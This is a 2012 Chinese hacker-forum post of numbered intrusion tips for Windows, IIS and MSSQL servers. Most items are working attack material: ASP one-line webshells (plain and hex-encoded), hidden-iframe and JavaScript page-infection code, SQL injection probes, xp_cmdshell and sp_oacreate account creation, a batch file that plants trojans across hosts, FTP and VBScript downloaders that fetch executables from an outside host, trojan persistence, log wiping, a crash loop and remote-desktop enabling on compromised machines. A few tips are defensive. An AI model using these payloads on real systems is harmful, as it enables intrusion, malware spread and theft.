找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2241|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
) S. x) g! p- e4 z  |. X* scacls C:\windows\system32 /G hqw20:R6 q% U% D8 |. g, ]3 z
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
  a3 R! \! v& A* ~" E7 K恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
# }1 T3 @! I! ~. u9 j, i! K' \
% X5 ?$ S5 x8 T: r5 q  U$ Z7 F2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
8 j6 }, A( I" [1 M- Q" G' ^3 E9 I) X
1 Z( s, K% L$ I+ g3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。6 J! o" i+ y; z8 g
, j7 e+ p1 P) s) I3 A- I
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号. F- F# z* s; M) Z" y7 m$ A" n! a) }

9 u! ?" m0 H" P& S' _5、利用INF文件来修改注册表! G8 w1 M) Z" G- k: i# f0 _$ N0 o
[Version]
( s% s0 U( a; v4 r  KSignature="$CHICAGO$"
$ ^5 c' k) N: X2 j[Defaultinstall]
& {/ L/ b5 R, |* p+ Q' jaddREG=Ating( x0 m3 c' O9 Z' \1 Z% E, F& f( a) G' b
[Ating]+ C7 W' ]) T9 {% d: H6 v! ]
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"$ R8 G; N. A( C: W" e) B' R
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
8 H# n7 s) p$ I7 T' a. Zrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
! k4 C2 t% c- G其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU& G4 a* m: d. x% a/ t
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
1 }0 J( D/ a8 o6 g3 G2 |3 hHKEY_CURRENT_CONFIG 简写为 HKCC
/ i" l& ~2 M$ A0 S0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
! g4 d, I, I: m7 K# j4 A- `" O; _: f7 K"1"这里代表是写入或删除注册表键值中的具体数据8 n9 b, _" q4 q# j1 F3 S5 P

( d: R4 ^4 Y* J0 ?6 q6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
! J( Z$ }: F% t- t, ~多了一步就是在防火墙里添加个端口,然后导出其键值  Q9 q2 @/ J3 @! F5 @# U+ _2 P
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
  e* j7 i5 _+ n4 V8 F4 t/ c. c3 N4 z: ~5 E
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽3 g. S7 m+ n9 B
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
  Y. ^. G  j$ N2 S( r* S  J( ]. u8 U1 M2 N+ Y; C8 ~  m, Q
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
. C3 u1 l8 g1 u  W2 h
; n  `5 K5 m& J; f  P) u4 H9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,& C! M; [8 ?5 E+ B; B# y
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。4 \7 C; ?$ B3 Y" @3 y0 a+ K
) U) ^8 }- [% f3 X3 ~7 C
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
1 \" ^" M1 W0 k5 c: h! O- O6 ?5 _: A3 ?( s( B9 g
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,& x9 Y: p$ i" E9 b: `' G
用法:xsniff –pass –hide –log pass.txt
# x9 l5 q" y$ z' n( o
- T$ P$ D$ z2 @12、google搜索的艺术
1 ?4 S7 m7 v" R1 ]3 E) c- F4 L搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
- x2 d. t$ n! y: m/ g  r" q/ E或“字符串的语法错误”可以找到很多sql注入漏洞。" w6 B" N5 `6 ^% R
, r/ N' s( C9 k+ O$ N
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
" G' \, B2 t1 Z5 E2 W* D
: c. `! ^) X0 x5 w( B' C- h14、cmd中输入 nc –vv –l –p 1987
" a' w3 J' G1 x8 C0 l! a/ p做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃0 s$ l. l* j* M5 x
) x" s) N: F) \5 K
15、制作T++木马,先写个ating.hta文件,内容为
. [- Q1 f( }: ]( |% f( X<script language="VBScript">; [% v7 u2 m) \) t5 K9 D  T
set wshshell=createobject ("wscript.shell" )2 Z+ f- k/ c- s' k. C! b4 y0 ~
a=wshshell.run("你马的名称",1)# F1 ~1 R3 s; g. b1 @
window.close
4 |9 H1 a, u* ?</script>* v7 R; R% b( i7 K1 l% e* g
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。+ b5 O  p: z8 u6 f2 ^

4 x) n! M4 G  P' ]6 M; O16、搜索栏里输入
+ ?( q0 a6 o% ]3 s3 T$ `: l5 y( w关键字%'and 1=1 and '%'='
, B. a8 V/ ^, j关键字%'and 1=2 and '%'='  S3 t! A# w" ?' {& o
比较不同处 可以作为注入的特征字符; T8 f; y) K( Y; l$ V- d

. Z2 S  c% p- w  A( \17、挂马代码<html>  R6 S4 A+ ]0 l
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
: A' n- u7 @1 ?+ l: [/ W8 D</html>, X. b. \4 v+ h
, ~1 u# J0 m( Z( i" c
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,2 t2 @' U/ z3 Q1 ]
net localgroup administrators还是可以看出Guest是管理员来。1 N& Y) _3 a  b; ^5 R

! Y' F. o3 B' m4 a+ V8 l3 q19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等5 T0 }- y) S7 @) @( n
用法: 安装: instsrv.exe 服务名称 路径
6 q5 l, B; R- A( ]' k# V0 X卸载: instsrv.exe 服务名称 REMOVE
  D' g  k$ b/ }9 i3 }8 B$ f. @, \* E+ ~7 Q4 [& ~
9 q  X) N# {" ]6 }# c2 ~
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
! x) v2 b7 X0 d2 B' @) h不能注入时要第一时间想到%5c暴库。) v* A, u+ X7 z% J! L

: E; ]) {' }' E- o22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~8 d7 F2 ~4 O* V

4 y$ O( c: D# C+ x23、缺少xp_cmdshell时) i# ]5 \% w  n$ ~7 q. [
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'8 T/ P. A4 w! o) G" S
假如恢复不成功,可以尝试直接加用户(针对开3389的)
7 O0 d0 \3 {0 v/ i% `/ i# O' t: p" O. ]declare @o int! V, ~$ q2 Q5 |, d3 m
exec sp_oacreate 'wscript.shell',@o out, d- Y, L8 q" s2 [4 m* h
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员5 V( Z+ Z' [! k. E' D
1 @6 _4 _& ^! b% j: F8 F
24.批量种植木马.bat
& U( c, {7 M: o/ C9 T9 {# Tfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中! @9 N* e* \4 w# h! j* p7 x0 K/ \
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间! E; U. ]0 p8 _  j8 j
扫描地址.txt里每个主机名一行 用\\开头
6 Q$ {" i9 B5 m  x0 G# q9 n) N
/ P7 {! h  M% z( R25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。: M: E5 @  @7 `
/ _9 }% c/ N: o% a$ R0 K
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.+ z- r% ~% W. R! x' a
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.' f& y1 ^9 o6 m# k
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马* D: h8 Q; [6 v6 u% K: V

8 z0 E/ p% h+ b9 X9 d* a2 M27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP" `1 C3 ]6 K- i7 G/ \
然后用#clear logg和#clear line vty *删除日志
, }9 @* W1 g. R9 F% L! y& {9 ]6 Q2 C0 l- H. Q7 g
28、电脑坏了省去重新安装系统的方法
/ @/ I7 `+ C5 s0 c& Q' T3 _7 j纯dos下执行,
5 o, C2 y0 V4 x  V4 G* axp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
/ v4 j7 z0 [" H2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config% |! ]" p9 S' L/ c
4 c" O3 V+ J* c: {* |) P3 ~! V' b
29、解决TCP/IP筛选 在注册表里有三处,分别是:
  i0 h2 V; Z& |6 L2 x% {( G6 Q' }HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
+ H7 V/ [$ u# ~9 E6 I+ EHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip. N  o  [% J; Q5 U/ u
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
/ O! e! \# M; \/ {3 R0 s+ P+ K$ Y分别用8 E% \; c1 k; {8 K' n% n! W
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip2 N* a6 S/ v* g8 z" \
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
! g( G7 ~: c$ K% fregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip3 N' e0 p2 n# a, F+ k) `, T( A
命令来导出注册表项* m0 U+ G* ]3 }
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
9 }+ D& Z# A; a+ {* m: z改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
: \0 q/ p% C% d) x$ lregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
, E7 ~% a) p# \' E! ?" }+ P
8 B& k0 C% g$ G30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
" I0 a' y  l+ [SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3& S6 S# t9 S9 O( R: P7 s5 d8 g! ]
( z7 J! R& n( J# t5 Z  ?, A0 m" D7 j
31、全手工打造开3389工具$ U1 Z& k- K8 p- m+ x5 V; B2 ]  D
打开记事本,编辑内容如下:
; @! a  E( b+ L2 ^$ d+ {6 ~echo [Components] > c:\sql
/ c1 L; S* N3 I4 M9 Decho TSEnable = on >> c:\sql  r4 [! n" V; b5 ^6 i
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q) H' \6 G. J9 v! `
编辑好后存为BAT文件,上传至肉鸡,执行$ c# k+ s8 |, Z2 n; s
' @8 G/ e7 C# d: y  }
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马; ]3 @9 b. s' R$ b$ C
- e) C, W' M6 `, x, |" m5 x
33、让服务器重启; w6 e1 U" c8 H% L) G, z1 b0 c
写个bat死循环:' r; x  u, [+ h( T+ ~
@echo off
  c* y% K8 O% Z6 R:loop1
! x, L9 d; k( N, G! ccls
' s0 V8 ?/ e" ]: ]: Nstart cmd.exe
/ Z0 A+ _7 y1 |- ^: jgoto loop1
' g  g0 P7 K0 ~3 E: q9 ], s+ b保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
- O( [- [1 n* j" d7 Z: X& y. d  }: z" l8 ]  P: y  C
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
( r  b7 Y8 p4 y3 q% ~; z@echo off) W- Q$ e( Z- B. s. l
date /t >c:/3389.txt! @& g9 C9 |9 y; o, o) N' h& S
time /t >>c:/3389.txt9 z  P4 S4 T( a* K+ i8 G$ h6 t! u
attrib +s +h c:/3389.bat' W5 l4 G. h& C" v) _
attrib +s +h c:/3389.txt
, d5 {3 Z1 ~: c+ D8 E% \netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt/ y0 n  N% t2 |0 |/ i
并保存为3389.bat  S' d+ u; W4 b- Y/ @
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号" G! Z7 s' o7 u+ F0 B5 W

/ u) t6 l% d& Q35、有时候提不了权限的话,试试这个命令,在命令行里输入:
4 @+ \0 N% ~2 b3 K, estart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
& z: F" A* F  j' e  [输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。/ {% h1 \) t+ m# Q; L4 R8 \" i$ u
! s7 v# f5 Z/ c1 R. E2 F1 j/ H
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件, g0 t4 l& ]$ ]* c
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址* l3 t8 I' h/ s0 A: ?
echo 你的FTP账号 >>c:\1.bat //输入账号, R* k. M, u3 k, @' N) ?+ ^
echo 你的FTP密码 >>c:\1.bat //输入密码* D) f5 L# U1 ^; R" V; n; m
echo bin >>c:\1.bat //登入
5 q& A6 L+ I4 M; @+ \* G' n: Techo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
) L: m8 J3 c" d' z7 [! Z3 K+ fecho bye >>c:\1.bat //退出
+ m$ ]5 w# Y: t7 K然后执行ftp -s:c:\1.bat即可1 s( ]6 B, T9 c7 ]) R% R3 n8 o
, h. b  _7 f; ], u5 d" Q/ l9 o# W+ G
37、修改注册表开3389两法0 G+ v1 }6 O. P9 e; W$ x9 l
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
7 ]1 B4 p6 `( h+ V8 J( B0 _echo Windows Registry Editor Version 5.00 >>3389.reg
, Q, `2 ?) M1 B4 {1 V! iecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg+ }# V% M, n7 a* U% I6 M7 [! B
echo "Enabled"="0" >>3389.reg
9 M; J" x" @3 K  j& |echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
0 ^0 V1 n) ]) X# CNT\CurrentVersion\Winlogon] >>3389.reg- P! [! L& _9 r2 I* f: k& ?* S
echo "ShutdownWithoutLogon"="0" >>3389.reg
  p# H  J; H, G, j! L7 lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]) a" V. f" s8 i3 \
>>3389.reg
/ O1 G8 {6 O! x8 \0 a$ decho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
3 U5 Y) w8 n) B2 xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
1 A% h1 j/ O; p! Q  z5 X3 j6 C>>3389.reg
) g' e. ^- Y, g: ^7 Hecho "TSEnabled"=dword:00000001 >>3389.reg* c4 U7 k( N$ r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg3 x' |' l& D9 s+ H/ ~
echo "Start"=dword:00000002 >>3389.reg% i- |( C" \! \7 g2 z+ ~5 O+ f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]9 P5 J- c- u1 Y, m; b0 T' b
>>3389.reg0 J" M# ?0 v  e- [* }7 i
echo "Start"=dword:00000002 >>3389.reg
  F" p3 f3 H5 iecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg8 n' d8 L" N8 l/ v3 g% i
echo "Hotkey"="1" >>3389.reg: }2 X/ R0 C) ]' G1 }7 k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 T0 m+ O6 f% n6 f& R! a7 uServer\Wds\rdpwd\Tds\tcp] >>3389.reg9 `! k  r6 w7 t2 ^2 |
echo "PortNumber"=dword:00000D3D >>3389.reg
5 m1 F5 g4 e% @/ Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; ?* L) X# ]- xServer\WinStations\RDP-Tcp] >>3389.reg. w  b1 V; D: n( q* g
echo "PortNumber"=dword:00000D3D >>3389.reg& y, S0 H2 U, N; h, }: G4 f
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。: C  N+ w* T* s9 f1 D5 j
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
% E! w" Z$ G( V6 m7 e+ M3 n0 f因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效+ ?! i( S4 h; G8 n7 h
(2)winxp和win2003终端开启
5 A$ h" H0 b' m$ a! c用以下ECHO代码写一个REG文件:& O" i% J3 V4 y; Z$ }* y7 m
echo Windows Registry Editor Version 5.00>>3389.reg" _9 ^; Y, A% n% h1 o2 Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, r4 B6 c) p; |8 |8 T, o0 S6 qServer]>>3389.reg
% f, z1 X; I; i. n$ B6 w6 u; N; ^) Zecho "fDenyTSConnections"=dword:00000000>>3389.reg- h' U# d0 [$ f0 e+ s7 Q$ A; v2 D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 F5 w) T0 r. i7 w* H7 v7 nServer\Wds\rdpwd\Tds\tcp]>>3389.reg
3 K( e) A8 o% U8 N4 y9 `echo "PortNumber"=dword:00000d3d>>3389.reg
$ ?/ `) R9 ^/ y8 qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ ]1 D& K# z% E$ y. rServer\WinStations\RDP-Tcp]>>3389.reg
8 |, X2 y" l- h# Zecho "PortNumber"=dword:00000d3d>>3389.reg
& n2 Q( k% b! g1 i然后regedit /s 3389.reg del 3389.reg' A; f4 j- L# f$ |  a# Y  d- r
XP下不论开终端还是改终端端口都不需重启
  Q) P% T' [- Y: K7 D: N% r$ B. G# R$ C+ }
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
; g! ?- e' [/ F3 X1 ]* q  Q用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
) U. @1 e; d# E# W: ^3 b9 U) W+ n! |6 ?! m
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
! ?. q1 Y7 z1 Y2 a7 A9 \/ G(1)数据库文件名应复杂并要有特殊字符
, E! {, J6 J3 Y6 z/ j(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
1 G1 k3 e% k: K4 G将conn.asp文档中的
/ s( G! v7 t3 g/ m! _; dDBPath = Server.MapPath("数据库.mdb")0 p6 V! U8 p; A
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath, l7 H5 h9 H  l; [$ T: C, X) l( i

, Q+ |4 Z( C4 C1 W" ~  E修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
* g% R* o# {# S2 Y% Z$ R! K; N(3)不放在WEB目录里& }: x! h% d, _5 f/ F. f, e
) c6 |0 }  Q8 M' ]  H
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉( O8 @5 y: W1 u6 E: M
可以写两个bat文件1 I; l8 ~$ |; c* o$ L
@echo off
8 h8 O$ M* S6 J8 |2 V6 n) M@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
' _0 n% A2 r9 c. r+ I@del c:\winnt\system32\query.exe4 X8 a( ?4 P( o& n
@del %SYSTEMROOT%\system32\dllcache\query.exe
3 i( s/ X& B( p( M@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的, o! h3 z% ?3 N, P8 ^" w

# \4 n8 X( B1 }/ p$ _5 f@echo off
0 E$ x5 G7 G" l@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe* S' w3 N4 ~; w% I, z% \
@del c:\winnt\system32\tsadmin.exe
. c# x, a2 u) v7 D% O8 j$ {* m@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
: L% `" `) Q( m" L4 R( ]" K3 ?0 a& d+ H4 d& i! M  l$ b# h9 S* \7 n
41、映射对方盘符
( e. q9 o& @8 B( x% O! b: }telnet到他的机器上,
' ^1 ]3 h" \3 ~2 X$ y: ~( Knet share 查看有没有默认共享 如果没有,那么就接着运行3 n% P1 a/ H4 ?2 T) S
net share c$=c:
- A5 _. l! @& {) f1 Jnet share现在有c$3 q9 p5 M9 P3 T& t
在自己的机器上运行
) C: G9 N& _, I3 T5 x# \net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
) Z( p3 W- ?( U( z0 ]6 D% A( k9 o
42、一些很有用的老知识! K: V' B8 t( J* Z
type c:\boot.ini ( 查看系统版本 )
3 n/ ], u& f0 p: p2 Qnet start (查看已经启动的服务)
+ ?3 B2 o- G1 k# c3 ?* _query user ( 查看当前终端连接 )4 F' `$ E+ c4 l7 P( X
net user ( 查看当前用户 )2 X4 A4 [) [* C$ a% q
net user 用户 密码/add ( 建立账号 )
; O% s; f- G0 r" h- Nnet localgroup administrators 用户 /add (提升某用户为管理员)( T) Q0 X% F8 C6 l
ipconfig -all ( 查看IP什么的 )5 K! G/ V) W+ J: u2 Y+ x/ U) i
netstat -an ( 查看当前网络状态 )
( C* t' W9 u% W, r- t! R7 k2 S! g0 wfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)  F3 k$ a" B) g- j5 _8 @  E
克隆时Administrator对应1F42 D5 `; c, A: t- D" a3 d
guest对应1F5
  a0 d- z2 G: q1 s/ I1 Rtsinternetuser对应3E8
2 N) m, z1 K$ D- T4 P4 @
: u+ n; Y/ E0 ^43、如果对方没开3389,但是装了Remote Administrator Service- a2 z0 _2 V9 ]. y1 h
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
+ v* w8 S9 l, D$ B解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
2 g8 S6 j' e1 T4 F( p先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"' z. }# }1 f2 K$ U, g: g2 [

6 Q- ?, i  ~2 m& y, ^  a, [44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)9 \; W2 s7 [# _  q
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
5 Q6 ^3 f! e: g& [4 J5 B. i" z0 c) U% M8 U  [
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入), Y& y* Y: C  N/ a0 X6 a$ W
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
. I4 @" O# c/ V0 Z7 T! e0 [^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
6 J' @5 _. D  G" t7 ~) NCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
! x8 H, Q, k# b4 {3 ?! u3 s" b1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
, o- t1 ]* L8 m) a(这是完整的一句话,其中没有换行符)
* J0 D0 M5 }5 a9 T/ Z% r8 k+ H然后下载:% w3 y; k% o, J) ~: Z( w- M6 {2 J3 w
cscript down.vbs http://www.hack520.org/hack.exe hack.exe3 g. ], u- j, S

  c; W/ A, A- O! Y) D, L46、一句话木马成功依赖于两个条件:
- w. H# d0 U  l2 _; k1、服务端没有禁止adodb.Stream或FSO组件" t3 q0 h! |5 |5 r5 h7 G
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
* g5 T5 G4 ?2 X+ _0 X4 Q$ B6 z  e: a) d/ Q/ Q1 R) ^
47、利用DB_OWNER权限进行手工备份一句话木马的代码:2 ?6 |3 I" l0 l$ ~7 k+ t. d
;alter database utsz set RECOVERY FULL--+ o( m" @! ^/ F1 ~! ?1 `* P; P
;create table cmd (a image)--) R: P" ^/ h. b; n% y( A% G
;backup log utsz to disk = 'D:\cmd' with init--
8 E# p  V9 ]8 y. J( L;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--/ R, `* }( U5 X5 N! O  d; K. E( b
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
* r# {: A0 O/ q( \注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
: J4 ]  m( D3 u7 P+ y
2 Z$ a( w% q" Q9 {& \# @48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
& ?8 a! ^8 N. V5 j' [
6 V8 p# C7 ~8 Q( L' z用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
' u! ]# ~# S1 w所有会话用 'all'。
, V# M2 R2 m: x# ?' a$ i: I: A-s sessionid 列出会话的信息。
5 m2 q: b7 C  F5 s- \! j0 g-k sessionid 终止会话。
/ g+ r2 l. Y) e  \-m sessionid 发送消息到会话。
; C6 `4 Q& B- x& R) W8 y
$ o/ Y, G) _  r& u+ Q. e0 iconfig 配置 telnet 服务器参数。& F+ n3 X% L- [. l2 j
3 d7 S# Q, L+ E- x
common_options 为:. O3 y* @! c0 \  P. P( G1 V& K
-u user 指定要使用其凭据的用户
1 S; J- e3 m* q2 k$ b-p password 用户密码
+ H/ q" A0 a$ ]2 k: i
% V0 [2 O1 j! f- d5 Jconfig_options 为:1 [* x8 l# |3 u* Z$ K1 z* H
dom = domain 设定用户的默认域
6 n) Q' j- @, b" t8 n! H4 pctrlakeymap = yes|no 设定 ALT 键的映射
( b9 F. P# M+ z# D) Q" e2 m1 dtimeout = hh:mm:ss 设定空闲会话超时值1 i- }6 C% A, Q% D5 ?" A) L# W. S9 M
timeoutactive = yes|no 启用空闲会话。' \# q: {5 J2 Z' R$ n$ |
maxfail = attempts 设定断开前失败的登录企图数。
. N1 H, m# L4 F/ P7 y. U3 smaxconn = connections 设定最大连接数。
2 s( L5 ~( ~$ Iport = number 设定 telnet 端口。
' w3 }, _% F; z4 L# c, I0 ^  gsec = [+/-]NTLM [+/-]passwd
- e' K8 {& U+ b8 _! c( n设定身份验证机构+ ]3 ^' G7 t1 \. k. v, F: |
fname = file 指定审计文件名。
# @+ Y" @; g7 ?  z6 nfsize = size 指定审计文件的最大尺寸(MB)。
5 d  s% c' X; `mode = console|stream 指定操作模式。: d" a* _5 T8 Y9 c  C, G
auditlocation = eventlog|file|both
. k* F3 w0 C# Y% o+ R" n指定记录地点+ }0 _* o2 Z: I
audit = [+/-]user [+/-]fail [+/-]admin! I. h& k2 v7 S  A# ~4 K# ~
6 ^% t* m" e. r4 v
49、例如:在IE上访问:) m( n5 E, G/ o' U  e! K7 C
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
' J; V% w; {' c, t& p& ^2 qhack.txt里面的代码是:
3 n* S  |" O6 d- O- F<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
/ N$ u; f* e* t: O3 y9 m# k把这个hack.txt发到你空间就可以了!
3 `1 W% \& A  j# c/ {1 c0 M" B4 E5 [! A这个可以利用来做网马哦!! n* V2 A. |: x# {

0 q! D$ V! h) k3 T50、autorun的病毒可以通过手动限制!
4 O2 F* K" e2 S( c- I$ q' H1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!: ?' s: v- U) B5 q: o% c5 P
2,打开盘符用右键打开!切忌双击盘符~
/ p( m/ ]! n( I6 g" v  z$ o3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
2 l- W, d/ A, e, ]1 |9 u* N8 ^; p
51、log备份时的一句话木马:4 K* Q9 ]+ c0 x" j7 H
a).<%%25Execute(request("go"))%%25>' K- D; v8 v1 D! i8 y3 x; \7 m
